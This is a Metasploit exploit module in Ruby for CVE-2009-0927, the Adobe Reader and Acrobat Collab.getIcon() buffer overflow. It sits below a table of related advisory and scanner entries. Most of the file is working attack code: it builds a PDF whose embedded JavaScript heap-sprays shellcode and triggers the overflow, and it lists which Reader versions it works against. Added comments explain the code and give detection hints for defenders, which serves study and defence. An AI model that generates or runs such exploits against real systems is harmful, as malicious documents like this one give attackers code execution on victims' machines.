| Reporter | Title | Published | Views | Family All 62 |
|---|---|---|---|---|
| | Immunity Canvas: ACROBAT_JS4 | 19 Mar 2009 10:30 | – | canvas |
| | Adobe Acrobat < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities | 28 Aug 2009 00:00 | – | nessus |
| | Adobe Reader < 9.1 / 8.1.4 / 7.1.1 Multiple Vulnerabilities | 11 Mar 2009 00:00 | – | nessus |
| | GLSA-200904-17 : Adobe Reader: User-assisted execution of arbitrary code | 21 Apr 2009 00:00 | – | nessus |
| | RHEL 3 / 4 / 5 : acroread (RHSA-2008:0974) | 24 Aug 2009 00:00 | – | nessus |
| | openSUSE Security Update : acroread (acroread-689) | 21 Jul 2009 00:00 | – | nessus |
| | openSUSE Security Update : acroread (acroread-689) | 21 Jul 2009 00:00 | – | nessus |
| | SuSE 11 Security Update : Acrobat Reader (SAT Patch Number 690) | 24 Sep 2009 00:00 | – | nessus |
| | SuSE 11 Security Update : acroread_ja (SAT Patch Number 769) | 24 Sep 2009 00:00 | – | nessus |
| | openSUSE 10 Security Update : acroread (acroread-6120) | 27 Mar 2009 00:00 | – | nessus |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
# File-format module for CVE-2009-0927. It writes a PDF whose embedded
# JavaScript calls Collab.getIcon() with an oversized argument (see #exploit).
#
# The code in this file opens no connection itself; its only output is the file
# handed to file_create, so the generated document is the artifact a defender
# would encounter (mail gateway, web proxy, disk).
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
# file_create and create_pdf are called in #exploit but not defined in this
# file; presumably they are supplied by these two mixins.
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
# Registers the module metadata and its single user option (FILENAME).
#
# @param info [Hash] metadata overrides merged in through update_info
def initialize(info = {})
super(update_info(info,
'Name' => 'Adobe Collab.getIcon() Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.
Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially
crafted pdf that a contains malformed Collab.getIcon() call, an attacker may
be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'MC',
'Didier Stevens <didier.stevens[at]gmail.com>',
'jduck'
],
# Identifiers to search for when mapping this module to advisories and patches.
'References' =>
[
[ 'CVE', '2009-0927' ],
[ 'OSVDB', '53647' ],
[ 'ZDI', '09-014' ],
],
# DisablePayloadHandler => true: no handler is started when the file is built.
# NOTE(review): presumably because the PDF is delivered out of band - confirm.
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true
},
# Payload is limited to 1024 bytes and must not contain a NUL byte.
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
# The matrix below is the authors' own record. The 7.1.1, 8.1.3 and 9.1.0
# entries are marked "reported", which reads as taken from reports rather
# than tested; they match the fixed versions named in the Description.
# test results (on Windows XP SP3)
# reader 7.0.5 - no trigger
# reader 7.0.8 - no trigger
# reader 7.0.9 - no trigger
# reader 7.1.0 - no trigger
# reader 7.1.1 - reported not vulnerable
# reader 8.0.0 - works
# reader 8.1.2 - works
# reader 8.1.3 - reported not vulnerable
# reader 9.0.0 - works
# reader 9.1.0 - reported not vulnerable
# 'Ret' is left empty; nothing in #exploit reads it.
[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],
],
'DisclosureDate' => '2009-03-24',
'DefaultTarget' => 0))
register_options(
[
# Required option; name of the output file, defaulting to msf.pdf.
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
])
end
# Builds the JavaScript, wraps it in a PDF with create_pdf and writes the
# result with file_create. Takes no arguments; reads payload, target and
# datastore['FILENAME'] from the module instance.
def exploit
# Encode the payload bytes in the form JavaScript unescape() accepts, using
# the byte order of the target architecture.
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Four bytes of NOPs, encoded the same way.
nops = Rex::Text.to_unescape(make_nops(4))
# Twelve random alphabetic identifiers, each 1..100 characters long, used as
# the JavaScript variable names below. They differ on every run, so no
# variable name in a generated file is a stable indicator.
rand1 = rand_text_alpha(rand(100) + 1)
rand2 = rand_text_alpha(rand(100) + 1)
rand3 = rand_text_alpha(rand(100) + 1)
rand4 = rand_text_alpha(rand(100) + 1)
rand5 = rand_text_alpha(rand(100) + 1)
rand6 = rand_text_alpha(rand(100) + 1)
rand7 = rand_text_alpha(rand(100) + 1)
rand8 = rand_text_alpha(rand(100) + 1)
rand9 = rand_text_alpha(rand(100) + 1)
rand10 = rand_text_alpha(rand(100) + 1)
rand11 = rand_text_alpha(rand(100) + 1)
rand12 = rand_text_alpha(rand(100) + 1)
# JavaScript embedded in the PDF. Read top to bottom, it:
#   1. unescapes the payload and a run of NOPs into strings;
#   2. grows a filler string in a loop bounded by 0x40000 and stores 1450
#      filler+payload strings in an array (the "JS Heap Spray" of the target name);
#   3. doubles a newline string (unescape("%0a")) until it is at least 0x4000
#      long, prefixes "N.", and passes it to Collab.getIcon(), the call the
#      Description names as the overflow.
# Detection note: the Collab.getIcon() call, the unescape() calls and the loop
# constants are the same in every generated file, whereas all identifiers vary.
# create_pdf is not shown here and may encode or compress the stream, so
# matching should be done on the decoded JavaScript.
script = %Q|
var #{rand1} = unescape("#{shellcode}");
var #{rand2} ="";
for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
#{rand4} = #{rand2} + #{rand1};
#{rand5} = unescape("#{nops}");
#{rand6} = 20;
#{rand7} = #{rand6}+#{rand4}.length
while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
#{rand8} = #{rand5}.substring(0, #{rand7});
#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});
while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};
#{rand10} = new Array();
for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};
var #{rand12} = unescape("%0a");
while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};
#{rand12} = "N."+#{rand12};
Collab.getIcon(#{rand12});
|
# Create the pdf
# The commented-out make_pdf call is left over from an earlier version;
# create_pdf is the call actually used.
#pdf = make_pdf(script)
pdf = create_pdf(script)
print_status("Creating '#{datastore['FILENAME']}' file...")
# Writes the document to disk; the file name comes from the FILENAME option.
file_create(pdf)
end
end